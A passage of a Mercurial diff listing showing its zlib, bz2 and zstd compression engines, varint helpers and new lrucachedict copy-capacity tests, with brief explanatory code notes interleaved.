3412 3425 def __init__(self, fh):
3413 3426 super(_BZ2CompressedStreamReader, self).__init__(fh)
3414 3427 self._decompobj = bz2.BZ2Decompressor()
3415 3428 def _decompress(self, chunk):
3416 3429 newbuf = self._decompobj.decompress(chunk)
3417 3430 if newbuf:
3418 3431 self._pending.append(newbuf)
3419 3432 try:
3420 3433 while True:
3421 3434 newbuf = self._decompobj.decompress('')
3422 3435 if newbuf:
3423 3436 self._pending.append(newbuf)
3424 3437 else:
3425 3438 break
3426 3439 except EOFError:
3427 3440 self._eof = True
3428 3441
3429 3442 class _TruncatedBZ2CompressedStreamReader(_BZ2CompressedStreamReader):
3430 3443 def __init__(self, fh):
3431 3444 super(_TruncatedBZ2CompressedStreamReader, self).__init__(fh)
3432 3445 newbuf = self._decompobj.decompress('BZ')
3433 3446 if newbuf:
3434 3447 self._pending.append(newbuf)
3435 3448
3436 3449 class _ZstdCompressedStreamReader(_CompressedStreamReader):
3437 3450 def __init__(self, fh, zstd):
3438 3451 super(_ZstdCompressedStreamReader, self).__init__(fh)
3439 3452 self._zstd = zstd
3440 3453 self._decompobj = zstd.ZstdDecompressor().decompressobj()
3441 3454 def _decompress(self, chunk):
3442 3455 newbuf = self._decompobj.decompress(chunk)
3443 3456 if newbuf:
3444 3457 self._pending.append(newbuf)
3445 3458 try:
3446 3459 while True:
3447 3460 newbuf = self._decompobj.decompress('')
3448 3461 if newbuf:
3449 3462 self._pending.append(newbuf)
3450 3463 else:
3451 3464 break
3452 3465 except self._zstd.ZstdError:
3453 3466 self._eof = True
3454 3467
3455 3468 class _zlibengine(compressionengine):
3456 3469 def name(self):
3457 3470 return 'zlib'
3458 3471
3459 3472 def bundletype(self):
3460 3473 """zlib compression using the DEFLATE algorithm.
3461 3474
3462 3475 All Mercurial clients should support this format. The compression
3463 3476 algorithm strikes a reasonable balance between compression ratio
3464 3477 and size.
3465 3478 """
3466 3479 return 'gzip', 'GZ'
3467 3480
3468 3481 def wireprotosupport(self):
3469 3482 return compewireprotosupport('zlib', 20, 20)
3470 3483
3471 3484 def revlogheader(self):
3472 3485 return 'x'
3473 3486
3474 3487 def compressstream(self, it, opts=None):
3475 3488 opts = opts or {}
3476 3489
3477 3490 z = zlib.compressobj(opts.get('level', -1))
3478 3491 for chunk in it:
3479 3492 data = z.compress(chunk)
3480 3493 # Not all calls to compress emit data. It is cheaper to inspect
3481 3494 # here than to feed empty chunks through the generator.
3482 3495 if data:
3483 3496 yield data
3484 3497
3485 3498 yield z.flush()
3486 3499
3487 3500 def decompressorreader(self, fh):
3488 3501 return _GzipCompressedStreamReader(fh)
3489 3502
3490 3503 class zlibrevlogcompressor(object):
3491 3504 def compress(self, data):
3492 3505 insize = len(data)
3493 3506 # Caller handles empty input case.
3494 3507 assert insize > 0
3495 3508
3496 3509 if insize < 44:
3497 3510 return None
3498 3511
3499 3512 elif insize <= 1000000:
3500 3513 compressed = zlib.compress(data)
3501 3514 if len(compressed) < insize:
3502 3515 return compressed
3503 3516 return None
3504 3517
3505 3518 # zlib makes an internal copy of the input buffer, doubling
3506 3519 # memory usage for large inputs. So do streaming compression
3507 3520 # on large inputs.
3508 3521 else:
3509 3522 z = zlib.compressobj()
3510 3523 parts = []
3511 3524 pos = 0
3512 3525 while pos < insize:
3513 3526 pos2 = pos + 2**20
3514 3527 parts.append(z.compress(data[pos:pos2]))
3515 3528 pos = pos2
3516 3529 parts.append(z.flush())
3517 3530
3518 3531 if sum(map(len, parts)) < insize:
3519 3532 return ''.join(parts)
3520 3533 return None
3521 3534
3522 3535 def decompress(self, data):
3523 3536 try:
3524 3537 return zlib.decompress(data)
3525 3538 except zlib.error as e:
3526 3539 raise error.RevlogError(_('revlog decompress error: %s') %
3527 3540 stringutil.forcebytestr(e))
3528 3541
3529 3542 def revlogcompressor(self, opts=None):
3530 3543 return self.zlibrevlogcompressor()
3531 3544
3532 3545 compengines.register(_zlibengine())
3533 3546
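A hedged round trip through the engine just registered (written for Python 2 semantics, where this module's native strings are bytes):

    import io
    from mercurial import util

    zl = util.compengines['zlib']

    # Streaming API: compressstream and decompressorreader are inverses.
    payload = b'line\n' * 1000
    stream = zl.compressstream(iter([payload]))
    reader = zl.decompressorreader(io.BytesIO(b''.join(stream)))
    assert reader.read(len(payload)) == payload

    # Revlog API: note the size cutoffs in zlibrevlogcompressor.compress.
    comp = zl.revlogcompressor()
    assert comp.compress(b'tiny') is None        # below the 44-byte floor
    blob = comp.compress(b'abc' * 200)           # 600 bytes, compressible
    assert comp.decompress(blob) == b'abc' * 200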
3534 3547 class _bz2engine(compressionengine):
3535 3548 def name(self):
3536 3549 return 'bz2'
3537 3550
3538 3551 def bundletype(self):
3539 3552 """An algorithm that produces smaller bundles than ``gzip``.
3540 3553
3541 3554 All Mercurial clients should support this format.
3542 3555
3543 3556 This engine will likely produce smaller bundles than ``gzip`` but
3544 3557 will be significantly slower, both during compression and
3545 3558 decompression.
3546 3559
3547 3560 If available, the ``zstd`` engine can yield similar or better
3548 3561 compression at much higher speeds.
3549 3562 """
3550 3563 return 'bzip2', 'BZ'
3551 3564
3552 3565 # We declare a protocol name but don't advertise by default because
3553 3566 # it is slow.
3554 3567 def wireprotosupport(self):
3555 3568 return compewireprotosupport('bzip2', 0, 0)
3556 3569
3557 3570 def compressstream(self, it, opts=None):
3558 3571 opts = opts or {}
3559 3572 z = bz2.BZ2Compressor(opts.get('level', 9))
3560 3573 for chunk in it:
3561 3574 data = z.compress(chunk)
3562 3575 if data:
3563 3576 yield data
3564 3577
3565 3578 yield z.flush()
3566 3579
3567 3580 def decompressorreader(self, fh):
3568 3581 return _BZ2CompressedStreamReader(fh)
3569 3582
3570 3583 compengines.register(_bz2engine())
3571 3584
3572 3585 class _truncatedbz2engine(compressionengine):
3573 3586 def name(self):
3574 3587 return 'bz2truncated'
3575 3588
3576 3589 def bundletype(self):
3577 3590 return None, '_truncatedBZ'
3578 3591
3579 3592 # We don't implement compressstream because it is hackily handled elsewhere.
3580 3593
3581 3594 def decompressorreader(self, fh):
3582 3595 return _TruncatedBZ2CompressedStreamReader(fh)
3583 3596
3584 3597 compengines.register(_truncatedbz2engine())
3585 3598
3586 3599 class _noopengine(compressionengine):
3587 3600 def name(self):
3588 3601 return 'none'
3589 3602
3590 3603 def bundletype(self):
3591 3604 """No compression is performed.
3592 3605
3593 3606 Use this compression engine to explicitly disable compression.
3594 3607 """
3595 3608 return 'none', 'UN'
3596 3609
3597 3610 # Clients always support uncompressed payloads. Servers don't because
3598 3611 # unless you are on a fast network, uncompressed payloads can easily
3599 3612 # saturate your network pipe.
3600 3613 def wireprotosupport(self):
3601 3614 return compewireprotosupport('none', 0, 10)
3602 3615
3603 3616 # We don't implement revlogheader because it is handled specially
3604 3617 # in the revlog class.
3605 3618
3606 3619 def compressstream(self, it, opts=None):
3607 3620 return it
3608 3621
3609 3622 def decompressorreader(self, fh):
3610 3623 return fh
3611 3624
3612 3625 class nooprevlogcompressor(object):
3613 3626 def compress(self, data):
3614 3627 return None
3615 3628
3616 3629 def revlogcompressor(self, opts=None):
3617 3630 return self.nooprevlogcompressor()
3618 3631
3619 3632 compengines.register(_noopengine())
3620 3633
3621 3634 class _zstdengine(compressionengine):
3622 3635 def name(self):
3623 3636 return 'zstd'
3624 3637
3625 3638 @propertycache
3626 3639 def _module(self):
3627 3640 # Not all installs have the zstd module available. So defer importing
3628 3641 # until first access.
3629 3642 try:
3630 3643 from . import zstd
3631 3644 # Force delayed import.
3632 3645 zstd.__version__
3633 3646 return zstd
3634 3647 except ImportError:
3635 3648 return None
3636 3649
3637 3650 def available(self):
3638 3651 return bool(self._module)
3639 3652
3640 3653 def bundletype(self):
3641 3654 """A modern compression algorithm that is fast and highly flexible.
3642 3655
3643 3656 Only supported by Mercurial 4.1 and newer clients.
3644 3657
3645 3658 With the default settings, zstd compression is both faster and yields
3646 3659 better compression than ``gzip``. It also frequently yields better
3647 3660 compression than ``bzip2`` while operating at much higher speeds.
3648 3661
3649 3662 If this engine is available and backwards compatibility is not a
3650 3663 concern, it is likely the best available engine.
3651 3664 """
3652 3665 return 'zstd', 'ZS'
3653 3666
3654 3667 def wireprotosupport(self):
3655 3668 return compewireprotosupport('zstd', 50, 50)
3656 3669
3657 3670 def revlogheader(self):
3658 3671 return '\x28'
3659 3672
3660 3673 def compressstream(self, it, opts=None):
3661 3674 opts = opts or {}
3662 3675 # zstd level 3 is almost always significantly faster than zlib
3663 3676 # while providing no worse compression. It strikes a good balance
3664 3677 # between speed and compression.
3665 3678 level = opts.get('level', 3)
3666 3679
3667 3680 zstd = self._module
3668 3681 z = zstd.ZstdCompressor(level=level).compressobj()
3669 3682 for chunk in it:
3670 3683 data = z.compress(chunk)
3671 3684 if data:
3672 3685 yield data
3673 3686
3674 3687 yield z.flush()
3675 3688
3676 3689 def decompressorreader(self, fh):
3677 3690 return _ZstdCompressedStreamReader(fh, self._module)
3678 3691
3679 3692 class zstdrevlogcompressor(object):
3680 3693 def __init__(self, zstd, level=3):
3681 3694 # TODO consider omitting frame magic to save 4 bytes.
3682 3695 # This writes content sizes into the frame header. That is
3683 3696 # extra storage. But it allows a correct size memory allocation
3684 3697 # to hold the result.
3685 3698 self._cctx = zstd.ZstdCompressor(level=level)
3686 3699 self._dctx = zstd.ZstdDecompressor()
3687 3700 self._compinsize = zstd.COMPRESSION_RECOMMENDED_INPUT_SIZE
3688 3701 self._decompinsize = zstd.DECOMPRESSION_RECOMMENDED_INPUT_SIZE
3689 3702
3690 3703 def compress(self, data):
3691 3704 insize = len(data)
3692 3705 # Caller handles empty input case.
3693 3706 assert insize > 0
3694 3707
3695 3708 if insize < 50:
3696 3709 return None
3697 3710
3698 3711 elif insize <= 1000000:
3699 3712 compressed = self._cctx.compress(data)
3700 3713 if len(compressed) < insize:
3701 3714 return compressed
3702 3715 return None
3703 3716 else:
3704 3717 z = self._cctx.compressobj()
3705 3718 chunks = []
3706 3719 pos = 0
3707 3720 while pos < insize:
3708 3721 pos2 = pos + self._compinsize
3709 3722 chunk = z.compress(data[pos:pos2])
3710 3723 if chunk:
3711 3724 chunks.append(chunk)
3712 3725 pos = pos2
3713 3726 chunks.append(z.flush())
3714 3727
3715 3728 if sum(map(len, chunks)) < insize:
3716 3729 return ''.join(chunks)
3717 3730 return None
3718 3731
3719 3732 def decompress(self, data):
3720 3733 insize = len(data)
3721 3734
3722 3735 try:
3723 3736 # This was measured to be faster than other streaming
3724 3737 # decompressors.
3725 3738 dobj = self._dctx.decompressobj()
3726 3739 chunks = []
3727 3740 pos = 0
3728 3741 while pos < insize:
3729 3742 pos2 = pos + self._decompinsize
3730 3743 chunk = dobj.decompress(data[pos:pos2])
3731 3744 if chunk:
3732 3745 chunks.append(chunk)
3733 3746 pos = pos2
3734 3747 # Frame should be exhausted, so no finish() API.
3735 3748
3736 3749 return ''.join(chunks)
3737 3750 except Exception as e:
3738 3751 raise error.RevlogError(_('revlog decompress error: %s') %
3739 3752 stringutil.forcebytestr(e))
3740 3753
3741 3754 def revlogcompressor(self, opts=None):
3742 3755 opts = opts or {}
3743 3756 return self.zstdrevlogcompressor(self._module,
3744 3757 level=opts.get('level', 3))
3745 3758
3746 3759 compengines.register(_zstdengine())
3747 3760
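Because the bundled python-zstandard module is optional, callers should guard on ``available()``; a hedged sketch:

    from mercurial import util

    zs = util.compengines['zstd']
    if zs.available():   # the zstd C extension may be absent
        comp = zs.revlogcompressor()
        blob = comp.compress(b'data' * 500)   # 2000 bytes, compressible
        # The output is a zstd frame whose magic begins with '\x28', the
        # byte revlogheader() declares, which routes decompression here.
        assert blob.startswith(b'\x28')
        assert comp.decompress(blob) == b'data' * 500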
3748 3761 def bundlecompressiontopics():
3749 3762 """Obtains a list of available bundle compressions for use in help."""
3750 3763 # help.makeitemsdocs() expects a dict of names to items with a .__doc__.
3751 3764 items = {}
3752 3765
3753 3766 # We need to format the docstring. So use a dummy object/type to hold it
3754 3767 # rather than mutating the original.
3755 3768 class docobject(object):
3756 3769 pass
3757 3770
3758 3771 for name in compengines:
3759 3772 engine = compengines[name]
3760 3773
3761 3774 if not engine.available():
3762 3775 continue
3763 3776
3764 3777 bt = engine.bundletype()
3765 3778 if not bt or not bt[0]:
3766 3779 continue
3767 3780
3768 3781 doc = pycompat.sysstr('``%s``\n %s') % (
3769 3782 bt[0], engine.bundletype.__doc__)
3770 3783
3771 3784 value = docobject()
3772 3785 value.__doc__ = doc
3773 3786 value._origdoc = engine.bundletype.__doc__
3774 3787 value._origfunc = engine.bundletype
3775 3788
3776 3789 items[bt[0]] = value
3777 3790
3778 3791 return items
3779 3792
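The mapping keys on user-facing bundle spec names, and each value's docstring is the formatted help text; a quick hedged peek (the exact keys depend on which engines load):

    from mercurial import util

    items = util.bundlecompressiontopics()
    print(sorted(items))   # e.g. ['bzip2', 'gzip', 'none', 'zstd']
    print(items['gzip'].__doc__.splitlines()[0])   # ``gzip``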
3780 3793 i18nfunctions = bundlecompressiontopics().values()
3781 3794
3782 3795 # convenient shortcut
3783 3796 dst = debugstacktrace
3784 3797
3785 3798 def safename(f, tag, ctx, others=None):
3786 3799 """
3787 3800 Generate a name that f can safely be renamed to in the given context.
3788 3801
3789 3802 f: filename to rename
3790 3803 tag: a string tag that will be included in the new name
3791 3804 ctx: a context, in which the new name must not exist
3792 3805 others: a set of other filenames that the new name must not be in
3793 3806
3794 3807 Returns a file name of the form oldname~tag[~number] which does not exist
3795 3808 in the provided context and is not in the set of other names.
3796 3809 """
3797 3810 if others is None:
3798 3811 others = set()
3799 3812
3800 3813 fn = '%s~%s' % (f, tag)
3801 3814 if fn not in ctx and fn not in others:
3802 3815 return fn
3803 3816 for n in itertools.count(1):
3804 3817 fn = '%s~%s~%s' % (f, tag, n)
3805 3818 if fn not in ctx and fn not in others:
3806 3819 return fn
3807 3820
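A hedged illustration: ``ctx`` only needs to support membership tests here, so a plain set can stand in for a real changectx:

    from mercurial import util

    taken = {'file.txt~backup'}   # pretend this name already exists
    util.safename('file.txt', 'backup', taken)
    # -> 'file.txt~backup~1': the bare name collides, so the
    #    itertools.count(1) loop finds the first free numeric suffix
    util.safename('other.txt', 'backup', taken)
    # -> 'other.txt~backup' (no collision, returned immediately)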
3808 3821 def readexactly(stream, n):
3809 3822 '''read n bytes from stream.read and abort if fewer were available'''
3810 3823 s = stream.read(n)
3811 3824 if len(s) < n:
3812 3825 raise error.Abort(_("stream ended unexpectedly"
3813 3826 " (got %d bytes, expected %d)")
3814 3827 % (len(s), n))
3815 3828 return s
3816 3829
3817 3830 def uvarintencode(value):
3818 3831 """Encode an unsigned integer value to a varint.
3819 3832
3820 3833 A varint is a variable length integer of 1 or more bytes. Each byte
3821 3834 except the last has the most significant bit set. The lower 7 bits of
3822 3835 each byte store the 2's complement representation, least significant group
3823 3836 first.
3824 3837
3825 3838 >>> uvarintencode(0)
3826 3839 '\\x00'
3827 3840 >>> uvarintencode(1)
3828 3841 '\\x01'
3829 3842 >>> uvarintencode(127)
3830 3843 '\\x7f'
3831 3844 >>> uvarintencode(1337)
3832 3845 '\\xb9\\n'
3833 3846 >>> uvarintencode(65536)
3834 3847 '\\x80\\x80\\x04'
3835 3848 >>> uvarintencode(-1)
3836 3849 Traceback (most recent call last):
3837 3850 ...
3838 3851 ProgrammingError: negative value for uvarint: -1
3839 3852 """
3840 3853 if value < 0:
3841 3854 raise error.ProgrammingError('negative value for uvarint: %d'
3842 3855 % value)
3843 3856 bits = value & 0x7f
3844 3857 value >>= 7
3845 3858 bytes = []
3846 3859 while value:
3847 3860 bytes.append(pycompat.bytechr(0x80 | bits))
3848 3861 bits = value & 0x7f
3849 3862 value >>= 7
3850 3863 bytes.append(pycompat.bytechr(bits))
3851 3864
3852 3865 return ''.join(bytes)
3853 3866
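Working the 1337 doctest by hand shows the bit layout:

    value = 1337              # 0b101_0011_1001
    low = value & 0x7f        # 0b011_1001 = 0x39
    first = 0x80 | low        # 0xb9: continuation bit set, more bytes follow
    rest = value >> 7         # 10 = 0x0a, fits in 7 bits, emitted as '\n'
    # so uvarintencode(1337) == '\xb9\n', matching the doctest above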
3854 3867 def uvarintdecodestream(fh):
3855 3868 """Decode an unsigned variable length integer from a stream.
3856 3869
3857 3870 The passed argument is anything that has a ``.read(N)`` method.
3858 3871
3859 3872 >>> try:
3860 3873 ... from StringIO import StringIO as BytesIO
3861 3874 ... except ImportError:
3862 3875 ... from io import BytesIO
3863 3876 >>> uvarintdecodestream(BytesIO(b'\\x00'))
3864 3877 0
3865 3878 >>> uvarintdecodestream(BytesIO(b'\\x01'))
3866 3879 1
3867 3880 >>> uvarintdecodestream(BytesIO(b'\\x7f'))
3868 3881 127
3869 3882 >>> uvarintdecodestream(BytesIO(b'\\xb9\\n'))
3870 3883 1337
3871 3884 >>> uvarintdecodestream(BytesIO(b'\\x80\\x80\\x04'))
3872 3885 65536
3873 3886 >>> uvarintdecodestream(BytesIO(b'\\x80'))
3874 3887 Traceback (most recent call last):
3875 3888 ...
3876 3889 Abort: stream ended unexpectedly (got 0 bytes, expected 1)
3877 3890 """
3878 3891 result = 0
3879 3892 shift = 0
3880 3893 while True:
3881 3894 byte = ord(readexactly(fh, 1))
3882 3895 result |= ((byte & 0x7f) << shift)
3883 3896 if not (byte & 0x80):
3884 3897 return result
3885 3898 shift += 7
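Decoding just reverses the arithmetic, accumulating 7-bit groups until a byte arrives with the high bit clear:

    # '\xb9\n' -> first byte 0xb9: payload 0x39, continuation bit set
    #             second byte 0x0a: payload 0x0a, high bit clear, stop
    # result = 0x39 | (0x0a << 7) = 57 + 1280 = 1337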
@@ -1,122 +1,176 b''
1 1 from __future__ import absolute_import, print_function
2 2
3 3 import unittest
4 4
5 5 import silenttestrunner
6 6
7 7 from mercurial import (
8 8 util,
9 9 )
10 10
11 11 class testlrucachedict(unittest.TestCase):
12 12 def testsimple(self):
13 13 d = util.lrucachedict(4)
14 14 self.assertEqual(d.capacity, 4)
15 15 d['a'] = 'va'
16 16 d['b'] = 'vb'
17 17 d['c'] = 'vc'
18 18 d['d'] = 'vd'
19 19
20 20 self.assertEqual(d['a'], 'va')
21 21 self.assertEqual(d['b'], 'vb')
22 22 self.assertEqual(d['c'], 'vc')
23 23 self.assertEqual(d['d'], 'vd')
24 24
25 25 # 'a' should be dropped because it was least recently used.
26 26 d['e'] = 've'
27 27 self.assertNotIn('a', d)
28 28
29 29 self.assertIsNone(d.get('a'))
30 30
31 31 self.assertEqual(d['b'], 'vb')
32 32 self.assertEqual(d['c'], 'vc')
33 33 self.assertEqual(d['d'], 'vd')
34 34 self.assertEqual(d['e'], 've')
35 35
36 36 # Touch entries in some order (both get and set).
37 37 d['e']
38 38 d['c'] = 'vc2'
39 39 d['d']
40 40 d['b'] = 'vb2'
41 41
42 42 # 'e' should be dropped now
43 43 d['f'] = 'vf'
44 44 self.assertNotIn('e', d)
45 45 self.assertEqual(d['b'], 'vb2')
46 46 self.assertEqual(d['c'], 'vc2')
47 47 self.assertEqual(d['d'], 'vd')
48 48 self.assertEqual(d['f'], 'vf')
49 49
50 50 d.clear()
51 51 for key in ('a', 'b', 'c', 'd', 'e', 'f'):
52 52 self.assertNotIn(key, d)
53 53
54 54 def testunfull(self):
55 55 d = util.lrucachedict(4)
56 56 d['a'] = 1
57 57 d['b'] = 2
58 58 d['a']
59 59 d['b']
60 60
61 61 for key in ('a', 'b'):
62 62 self.assertIn(key, d)
63 63
64 64 def testcopypartial(self):
65 65 d = util.lrucachedict(4)
66 66 d['a'] = 'va'
67 67 d['b'] = 'vb'
68 68
69 69 dc = d.copy()
70 70
71 71 self.assertEqual(len(dc), 2)
72 72 for key in ('a', 'b'):
73 73 self.assertIn(key, dc)
74 74 self.assertEqual(dc[key], 'v%s' % key)
75 75
76 76 self.assertEqual(len(d), 2)
77 77 for key in ('a', 'b'):
78 78 self.assertIn(key, d)
79 79 self.assertEqual(d[key], 'v%s' % key)
80 80
81 81 d['c'] = 'vc'
82 82 del d['b']
83 83 dc = d.copy()
84 84 self.assertEqual(len(dc), 2)
85 85 for key in ('a', 'c'):
86 86 self.assertIn(key, dc)
87 87 self.assertEqual(dc[key], 'v%s' % key)
88 88
89 89 def testcopyempty(self):
90 90 d = util.lrucachedict(4)
91 91 dc = d.copy()
92 92 self.assertEqual(len(dc), 0)
93 93
94 94 def testcopyfull(self):
95 95 d = util.lrucachedict(4)
96 96 d['a'] = 'va'
97 97 d['b'] = 'vb'
98 98 d['c'] = 'vc'
99 99 d['d'] = 'vd'
100 100
101 101 dc = d.copy()
102 102
103 103 for key in ('a', 'b', 'c', 'd'):
104 104 self.assertIn(key, dc)
105 105 self.assertEqual(dc[key], 'v%s' % key)
106 106
107 107 # 'a' should be dropped because it was least recently used.
108 108 dc['e'] = 've'
109 109 self.assertNotIn('a', dc)
110 110 for key in ('b', 'c', 'd', 'e'):
111 111 self.assertIn(key, dc)
112 112 self.assertEqual(dc[key], 'v%s' % key)
113 113
114 114 # Contents and order of original dict should remain unchanged.
115 115 dc['b'] = 'vb_new'
116 116
117 117 self.assertEqual(list(iter(d)), ['d', 'c', 'b', 'a'])
118 118 for key in ('a', 'b', 'c', 'd'):
119 119 self.assertEqual(d[key], 'v%s' % key)
120 120
121 def testcopydecreasecapacity(self):
122 d = util.lrucachedict(5)
123 d['a'] = 'va'
124 d['b'] = 'vb'
125 d['c'] = 'vc'
126 d['d'] = 'vd'
127
128 dc = d.copy(2)
129 for key in ('a', 'b'):
130 self.assertNotIn(key, dc)
131 for key in ('c', 'd'):
132 self.assertIn(key, dc)
133 self.assertEqual(dc[key], 'v%s' % key)
134
135 dc['e'] = 've'
136 self.assertNotIn('c', dc)
137 for key in ('d', 'e'):
138 self.assertIn(key, dc)
139 self.assertEqual(dc[key], 'v%s' % key)
140
141 # Original should remain unchanged.
142 for key in ('a', 'b', 'c', 'd'):
143 self.assertIn(key, d)
144 self.assertEqual(d[key], 'v%s' % key)
145
146 def testcopyincreasecapacity(self):
147 d = util.lrucachedict(5)
148 d['a'] = 'va'
149 d['b'] = 'vb'
150 d['c'] = 'vc'
151 d['d'] = 'vd'
152
153 dc = d.copy(6)
154 for key in ('a', 'b', 'c', 'd'):
155 self.assertIn(key, dc)
156 self.assertEqual(dc[key], 'v%s' % key)
157
158 dc['e'] = 've'
159 dc['f'] = 'vf'
160 for key in ('a', 'b', 'c', 'd', 'e', 'f'):
161 self.assertIn(key, dc)
162 self.assertEqual(dc[key], 'v%s' % key)
163
164 dc['g'] = 'vg'
165 self.assertNotIn('a', dc)
166 for key in ('b', 'c', 'd', 'e', 'f', 'g'):
167 self.assertIn(key, dc)
168 self.assertEqual(dc[key], 'v%s' % key)
169
170 # Original should remain unchanged.
171 for key in ('a', 'b', 'c', 'd'):
172 self.assertIn(key, d)
173 self.assertEqual(d[key], 'v%s' % key)
174
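The two new tests above pin down the behavior this changeset adds: ``copy()`` now takes an optional capacity, trimming to the most recently used entries when shrinking and leaving the original untouched either way. In short:

    d = util.lrucachedict(5)
    # ... insert 'a' through 'd' ...
    small = d.copy(2)   # keeps only the 2 most recently used ('c', 'd')
    big = d.copy(6)     # keeps all four and leaves room for 6 in total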
121 175 if __name__ == '__main__':
122 176 silenttestrunner.main(__name__)